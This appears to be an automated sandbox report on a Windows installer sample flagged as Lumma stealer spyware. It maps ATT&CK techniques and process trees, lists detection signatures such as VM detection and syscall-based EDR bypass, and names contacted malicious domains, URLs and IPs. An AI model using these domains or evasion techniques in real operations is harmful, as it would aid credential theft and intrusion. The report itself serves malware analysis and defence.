              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts2
              PowerShell              		Logon Script (Windows)1
              DLL Side-Loading              		11
              Process Injection              		Security Account Manager2
              Process Discovery              		SMB/Windows Admin SharesData from Network Shared Drive3
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              Deobfuscate/Decode Files or Information              		NTDS221
              Virtualization/Sandbox Evasion              		Distributed Component Object ModelInput Capture114
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Abuse Elevation Control Mechanism              		LSA Secrets1
              Application Window Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Obfuscated Files or Information              		Cached Domain Credentials2
              System Owner/User Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              DLL Side-Loading              		DCSync11
              File and Directory Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem224
              System Information Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1584511 Sample: Set-up.exe Startdate: 05/01/2025 Architecture: WINDOWS Score: 100 80 shockingrefle.click 2->80 82 klipvumisui.shop 2->82 84 2 other IPs or domains 2->84 104 Suricata IDS alerts for network traffic 2->104 106 Found malware configuration 2->106 108 Malicious sample detected (through community Yara rule) 2->108 110 8 other signatures 2->110 12 Set-up.exe 1 2->12         started        signatures3 process4 dnsIp5 86 shockingrefle.click 104.21.21.63, 443, 49748, 49750 CLOUDFLARENETUS United States 12->86 88 cegu.shop 185.161.251.21, 443, 49757 NTLGB United Kingdom 12->88 90 klipvumisui.shop 172.67.208.58, 443, 49758 CLOUDFLARENETUS United States 12->90 70 C:\Users\...\00ARFM6VTY24MGI8KNPL04W8K1.exe, PE32 12->70 dropped 114 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 12->114 116 Suspicious powershell command line found 12->116 118 Query firmware table information (likely to detect VMs) 12->118 120 4 other signatures 12->120 17 00ARFM6VTY24MGI8KNPL04W8K1.exe 2 12->17         started        21 powershell.exe 15 23 12->21         started        file6 signatures7 process8 file9 62 C:\Users\...\00ARFM6VTY24MGI8KNPL04W8K1.tmp, PE32 17->62 dropped 92 Multi AV Scanner detection for dropped file 17->92 23 00ARFM6VTY24MGI8KNPL04W8K1.tmp 3 5 17->23         started        94 Loading BitLocker PowerShell Module 21->94 26 conhost.exe 21->26         started        signatures10 process11 file12 64 C:\Users\user\AppData\Local\...\_isdecmp.dll, PE32 23->64 dropped 66 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 23->66 dropped 28 00ARFM6VTY24MGI8KNPL04W8K1.exe 2 23->28         started        process13 file14 68 C:\Users\...\00ARFM6VTY24MGI8KNPL04W8K1.tmp, PE32 28->68 dropped 31 00ARFM6VTY24MGI8KNPL04W8K1.tmp 5 7 28->31         started        process15 file16 72 C:\Users\user\AppData\...\is-3O7DV.tmp, PE32 31->72 dropped 74 C:\Users\user\...\BrightLib.exe (copy), PE32 31->74 dropped 76 C:\Users\user\AppData\Local\...\_isdecmp.dll, PE32 31->76 dropped 78 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 31->78 dropped 34 BrightLib.exe 31->34         started        37 cmd.exe 1 31->37         started        39 cmd.exe 31->39         started        41 5 other processes 31->41 process17 signatures18 96 Tries to detect virtualization through RDTSC time measurements 34->96 98 Sample or dropped binary is a compiled AutoHotkey binary 34->98 100 Switches to a custom stack to bypass stack traces 34->100 102 Found direct / indirect Syscall (likely to bypass EDR) 34->102 43 tasklist.exe 1 37->43         started        46 conhost.exe 37->46         started        48 find.exe 37->48         started        50 conhost.exe 39->50         started        52 tasklist.exe 39->52         started        54 find.exe 39->54         started        56 conhost.exe 41->56         started        58 conhost.exe 41->58         started        60 11 other processes 41->60 process19 signatures20 112 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 43->112

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              Set-up.exe13%VirustotalBrowse
              Set-up.exe16%ReversingLabsWin32.Trojan.Generic

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\00ARFM6VTY24MGI8KNPL04W8K1.exe74%ReversingLabsWin32.Spyware.Lummastealer
              C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmp0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\is-89T31.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmp0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\is-DND4F.tmp\_isetup\_isdecmp.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\is-DND4F.tmp\_isetup\_setup64.tmp0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\is-FT9F2.tmp\_isetup\_isdecmp.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\is-FT9F2.tmp\_isetup\_setup64.tmp0%ReversingLabs
              C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe (copy)8%ReversingLabs
              C:\Users\user\AppData\Roaming\ColorStreamLib\is-3O7DV.tmp8%ReversingLabs

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              https://shockingrefle.click/api&0%Avira URL Cloudsafe
              https://shockingrefle.click/apitZ0%Avira URL Cloudsafe
              https://shockingrefle.click/api)0%Avira URL Cloudsafe
              https://www.tomabo.com/mp4-player/update.xml5.3.10CMP4PlayerDocGo0%Avira URL Cloudsafe
              https://shockingrefle.click/api/0%Avira URL Cloudsafe
              https://shockingrefle.click/oba0%Avira URL Cloudsafe
              https://www.tomabo.com/mp4-player/download.html0%Avira URL Cloudsafe
              http://certs.s0%Avira URL Cloudsafe
              https://www.tomabo.com/mp4-playerA0%Avira URL Cloudsafe
              https://shockingrefle.click/0%Avira URL Cloudsafe
              shockingrefle.click0%Avira URL Cloudsafe
              https://www.tomabo.com/videos/dog-and-balls.mp40%Avira URL Cloudsafe
              https://shockingrefle.click/bu0%Avira URL Cloudsafe
              https://shockingrefle.click/apiH0%Avira URL Cloudsafe
              https://cegu.shop/8574262446/ph.txtk5100%Avira URL Cloudmalware
              https://klipvumisui.shop/100%Avira URL Cloudmalware
              https://shockingrefle.click/api0%Avira URL Cloudsafe
              https://shockingrefle.cl0%Avira URL Cloudsafe
              https://www.tomabo.com/mp4-player/purchase.htmlhttps://www.tomabo.comMP40%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              cegu.shop
              		185.161.251.21
              		truefalse
                		high
                shockingrefle.click
                		104.21.21.63
                		truetrue
                  		unknown
                  klipvumisui.shop
                  		172.67.208.58
                  		truefalse
                    		high
                    dfgh.online
                    		unknown
                    		unknownfalse
                      		high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      shockingrefle.clicktrue
                      • Avira URL Cloud: safe
                      		unknown
                      https://klipvumisui.shop/int_clp_sha.txtfalse
                        		high
                        rabidcowse.shopfalse
                          		high
                          wholersorie.shopfalse
                            		high
                            https://shockingrefle.click/apitrue
                            • Avira URL Cloud: safe
                            		unknown
                            cloudewahsj.shopfalse
                              		high
                              noisycuttej.shopfalse
                                		high
                                nearycrepso.shopfalse
                                  		high
                                  https://cegu.shop/8574262446/ph.txtfalse
                                    		high
                                    framekgirus.shopfalse
                                      		high
                                      tirepublicerj.shopfalse
                                        		high
                                        abruptyopsn.shopfalse
                                          		high

                                          URLs from Memory and Binaries

                                          NameSourceMaliciousAntivirus DetectionReputation
                                          https://duckduckgo.com/chrome_newtabSet-up.exe, 00000000.00000003.1851254970.00000000035DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupUSet-up.exe, 00000000.00000003.1968160850.00000000038B7000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1964745312.000000000399E000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1969999675.0000000003ACD000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1969148116.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1963708736.000000000399F000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1964586600.00000000038B4000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1972396342.00000000038BD000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1963413464.0000000003A67000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1960222831.0000000003987000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1959498000.00000000038BF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1970288259.00000000038B6000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1957161932.00000000038B7000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1960921850.00000000038B4000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1960081479.00000000038BA000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1960448359.0000000003981000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1962734467.00000000038B0000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1960734284.000000000398C000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1964281016.000000000399B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1972252215.0000000003AC7000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1957892375.00000000038B1000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1959007296.000000000397E000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://certs.securetrust.com/CA0:Set-up.exe, 00000000.00000003.2016419178.00000000035BD000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2011751929.000000000363D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2017889447.000000000363D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://duckduckgo.com/ac/?q=Set-up.exe, 00000000.00000003.1851254970.00000000035DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://shockingrefle.click/apitZSet-up.exe, 00000000.00000003.1901630959.0000000000961000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://www.tomabo.com/mp4-player/update.xml5.3.10CMP4PlayerDocGoSet-up.exe, 00000000.00000003.1828016050.0000000002C12000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2016707111.00000000004EE000.00000008.00000001.01000000.00000003.sdmp, Set-up.exe, 00000000.00000000.1686187602.00000000004EE000.00000008.00000001.01000000.00000003.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://ocsp.vikingcloud.com/0ASet-up.exe, 00000000.00000002.2017722041.00000000035BC000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2011751929.000000000363D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2017889447.000000000363D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://certs.securetrust.com/issuers/TWGCA.crt0Set-up.exe, 00000000.00000003.2016419178.00000000035BD000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2011751929.000000000363D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2017889447.000000000363D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://ocsp.vikingcloud.com/0:Set-up.exe, 00000000.00000003.2016419178.00000000035BD000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2011751929.000000000363D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2017889447.000000000363D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://shockingrefle.click/obaSet-up.exe, 00000000.00000003.1886496911.00000000009B4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://certs.securetrust.com/issuers/VCTWGTSCA_L1.crt0Set-up.exe, 00000000.00000003.2011751929.000000000363D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2017889447.000000000363D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://shockingrefle.click/api)Set-up.exe, 00000000.00000003.2011990393.00000000009C3000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2017191602.00000000009C6000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2016155088.00000000009C6000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1916327724.00000000009C6000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1901401410.00000000009C3000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1907276556.00000000009C6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://dfgh.online/invoker.php?compName=Set-up.exe, Set-up.exe, 00000000.00000003.2011990393.00000000009C3000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2016155088.00000000009DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://shockingrefle.click/api&Set-up.exe, 00000000.00000003.1863772475.00000000009B4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Set-up.exe, 00000000.00000003.1851254970.00000000035DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Set-up.exe, 00000000.00000003.1863427908.0000000003605000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1851939199.000000000360C000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1863686725.0000000003605000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1852015791.0000000003605000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1863868485.0000000003605000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1852172233.0000000003605000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://crl.vikingcloud.com/TWGCA.crl0tSet-up.exe, 00000000.00000003.2016419178.00000000035BD000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2011751929.000000000363D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2017889447.000000000363D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://shockingrefle.click/api/Set-up.exe, 00000000.00000003.2011990393.00000000009C3000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2017191602.00000000009C6000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2016155088.00000000009C6000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1916327724.00000000009C6000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1907276556.00000000009C6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://ocsp.starfieldtech.com/0DSet-up.exe, 00000000.00000003.1828016050.00000000073C5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://certs.securetrust.com/CA05Set-up.exe, 00000000.00000003.2016419178.00000000035BD000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2011751929.000000000363D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2017889447.000000000363D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://crl.thawte.com/ThawteTimestampingCA.crl0Set-up.exe, 00000000.00000003.1828016050.00000000073C5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallSet-up.exe, 00000000.00000003.1852015791.00000000035E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchSet-up.exe, 00000000.00000003.1851254970.00000000035DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://certs.sSet-up.exe, 00000000.00000002.2017722041.00000000035BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://shockingrefle.click/Set-up.exe, 00000000.00000002.2017129214.0000000000962000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://certs.securetrust.com/CA0Set-up.exe, 00000000.00000002.2017722041.00000000035BC000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2011751929.000000000363D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2017889447.000000000363D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://crl.starfieldtech.com/repository/sfsroot.crl0PSet-up.exe, 00000000.00000003.1828016050.00000000073C5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://www.tomabo.com/mp4-player/download.htmlSet-up.exe, 00000000.00000003.1828016050.0000000002C12000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2016707111.00000000004EE000.00000008.00000001.01000000.00000003.sdmp, Set-up.exe, 00000000.00000000.1686187602.00000000004EE000.00000008.00000001.01000000.00000003.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://www.tomabo.com/mp4-playerASet-up.exe, 00000000.00000003.1828016050.0000000002C12000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2016707111.00000000004EE000.00000008.00000001.01000000.00000003.sdmp, Set-up.exe, 00000000.00000000.1686187602.00000000004EE000.00000008.00000001.01000000.00000003.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://support.mozilla.org/products/firefoxgro.allSet-up.exe, 00000000.00000003.1875059104.00000000036D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://crl.trustwave.com/TWGCA.crl0nSet-up.exe, 00000000.00000002.2017722041.00000000035BC000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2011751929.000000000363D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2017889447.000000000363D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://www.google.com/images/branding/product/ico/googleg_lodp.icoSet-up.exe, 00000000.00000003.1851254970.00000000035DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://www.tomabo.com/videos/dog-and-balls.mp4Set-up.exe, 00000000.00000003.1828016050.0000000002D19000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2016787168.000000000050E000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      http://crl.securetrust.com/TWGCSCA_L1.crl0ySet-up.exe, 00000000.00000003.2016419178.00000000035BD000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2011751929.000000000363D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2017889447.000000000363D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://shockingrefle.click/buSet-up.exe, 00000000.00000003.2016247632.000000000095F000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1916494967.0000000000961000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2016469638.0000000000961000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2017129214.0000000000962000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://shockingrefle.clSet-up.exe, 00000000.00000003.1889886158.00000000009D6000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1890057983.00000000009D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        http://ocsp.thawte.com0Set-up.exe, 00000000.00000003.1828016050.00000000073C5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Set-up.exe, 00000000.00000003.1851254970.00000000035DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Set-up.exe, 00000000.00000003.1863427908.0000000003605000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1851939199.000000000360C000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1863686725.0000000003605000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1852015791.0000000003605000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1863868485.0000000003605000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1852172233.0000000003605000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://certificates.starfieldtech.com/repository/1604Set-up.exe, 00000000.00000003.1889930772.0000000000961000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2016247632.000000000095F000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1901630959.0000000000961000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1916494967.0000000000961000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2016469638.0000000000961000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1828016050.00000000073C5000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2017129214.0000000000962000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://www.ecosia.org/newtab/Set-up.exe, 00000000.00000003.1851254970.00000000035DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://www.symauth.com/cps0(Set-up.exe, 00000000.00000003.1828016050.00000000073C5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brSet-up.exe, 00000000.00000003.1875059104.00000000036D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://certs.securetrust.com/issuers/TWGCSCA_L1.crt0Set-up.exe, 00000000.00000003.2016419178.00000000035BD000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2011751929.000000000363D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2017889447.000000000363D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://klipvumisui.shop/Set-up.exe, 00000000.00000003.2016155088.00000000009C6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: malware
                                                                                                        		unknown
                                                                                                        https://ac.ecosia.org/autocomplete?q=Set-up.exe, 00000000.00000003.1851254970.00000000035DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://www.tomabo.com/mp4-player/purchase.htmlhttps://www.tomabo.comMP4Set-up.exe, 00000000.00000003.1828016050.0000000002C12000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2016707111.00000000004EE000.00000008.00000001.01000000.00000003.sdmp, Set-up.exe, 00000000.00000000.1686187602.00000000004EE000.00000008.00000001.01000000.00000003.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          http://crl.starfieldtech.com/repository/0Set-up.exe, 00000000.00000003.1828016050.00000000073C5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://crl.microSet-up.exe, 00000000.00000003.1889930772.0000000000961000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1916410252.00000000009B1000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1901630959.0000000000961000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://www.symauth.com/rpa00Set-up.exe, 00000000.00000003.1828016050.00000000073C5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://support.microsofSet-up.exe, 00000000.00000003.1851939199.000000000360E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://crl.vikingcloud.com/VCTWGTSCA_L1.crl0Set-up.exe, 00000000.00000002.2017722041.00000000035BC000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2011751929.000000000363D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2017889447.000000000363D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://shockingrefle.click/apiHSet-up.exe, 00000000.00000003.1874172879.00000000009B4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    http://ocsp.securetrust.com/0?Set-up.exe, 00000000.00000003.2016419178.00000000035BD000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2011751929.000000000363D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2017889447.000000000363D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesSet-up.exe, 00000000.00000003.1852015791.00000000035E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Set-up.exe, 00000000.00000003.1851254970.00000000035DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://cegu.shop/8574262446/ph.txtk5Set-up.exe, 00000000.00000003.2016454308.00000000009B7000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2017176614.00000000009B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: malware
                                                                                                                          		unknown

                                                                                                                          World Map of Contacted IPs

                                                                                                                          • No. of IPs < 25%
                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                          • 75% < No. of IPs

                                                                                                                          Public IPs

                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                          185.161.251.21
                                                                                                                          		cegu.shopUnited Kingdom
                                                                                                                          		5089NTLGBfalse
                                                                                                                          172.67.208.58
                                                                                                                          		klipvumisui.shopUnited States
                                                                                                                          		13335CLOUDFLARENETUSfalse
                                                                                                                          104.21.21.63
                                                                                                                          		shockingrefle.clickUnited States
                                                                                                                          		13335CLOUDFLARENETUStrue

                                                                                                                          General Information

                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                          Analysis ID:1584511
                                                                                                                          Start date and time:2025-01-05 18:07:13 +01:00
                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                          Overall analysis duration:0h 9m 48s
                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                          Report type:full
                                                                                                                          Cookbook file name:default.jbs
                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                          Number of analysed new started processes analysed:38
                                                                                                                          Number of new started drivers analysed:0
